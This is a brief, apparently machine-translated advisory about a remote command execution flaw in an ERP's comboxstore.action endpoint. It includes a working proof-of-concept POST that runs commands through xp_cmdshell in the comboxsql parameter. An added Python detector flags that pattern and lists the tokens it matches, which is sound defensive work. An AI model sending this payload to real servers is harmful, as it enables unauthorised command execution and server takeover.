Expect To Create Erp Comboxstore Action Remote Command Execution Vulnerability
Vulnerability Description
The comboxstore.action interface of this ERP has a remote command execution vulnerability. An attacker can use it to obtain server privileges and execute arbitrary commands.
Vulnerability Impact
Hope to manufacture ERP
Network surveying and mapping
Vulnerability Reproduction
Login page
Verify POC
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:

comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
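A defender-side check for the request pattern above, added here as an example and not part of the original post: it inspects requests to comboxstore.action and reports when the comboxsql parameter carries command-execution or stacked-statement tokens, even when the value is URL-encoded more than once. The rule list, the function names and every sample other than the page's own request body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

ENDPOINT = "/mainfunctions/comboxstore.action"  # path from the request above, lower-cased
PARAM = "comboxsql"                             # parameter from the request above

# Assumption: tokens with no place in a combo-box lookup on SQL Server.
RULES = [
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("exec", re.compile(r"\bexec(ute)?\b")),
    ("sp_configure", re.compile(r"\bsp_configure\b")),
    ("stacked-statement", re.compile(r";\s*\w")),
]

def normalise(value, max_rounds=3):
    """Undo nested URL-encoding, drop /* */ comments, collapse whitespace, lower-case."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def inspect_request(target, body):
    """Return names of the rules a request matches; [] if clean or another endpoint."""
    parts = urlsplit(target)
    if parts.path.split(";")[0].lower() != ENDPOINT:
        return []
    hits = []
    for source in (parts.query, body):
        for raw in parse_qs(source, keep_blank_values=True).get(PARAM, []):
            text = normalise(raw)
            hits += [name for name, rx in RULES if rx.search(text) and name not in hits]
    return hits

# Request body exactly as shown on this page.
PAGE_BODY = r"comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'"
# Constructed samples: a double-encoded variant and a plain lookup.
DOUBLE_ENCODED = r"comboxsql=EXEC%2520xp_cmdshell%2520'type%2520C:\Windows\Win.ini'"
PLAIN_LOOKUP = "comboxsql=select+name+from+store_list"

if __name__ == "__main__":
    path = "/mainFunctions/comboxstore.action"
    for label, body in [("page", PAGE_BODY), ("double", DOUBLE_ENCODED), ("plain", PLAIN_LOOKUP)]:
        print(label, inspect_request(path, body))
```

An empty result only means none of the listed tokens matched; an endpoint that accepts a SQL statement from the client still needs to be fixed on the server side.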
This post is licensed under CC BY 4.0 by the author.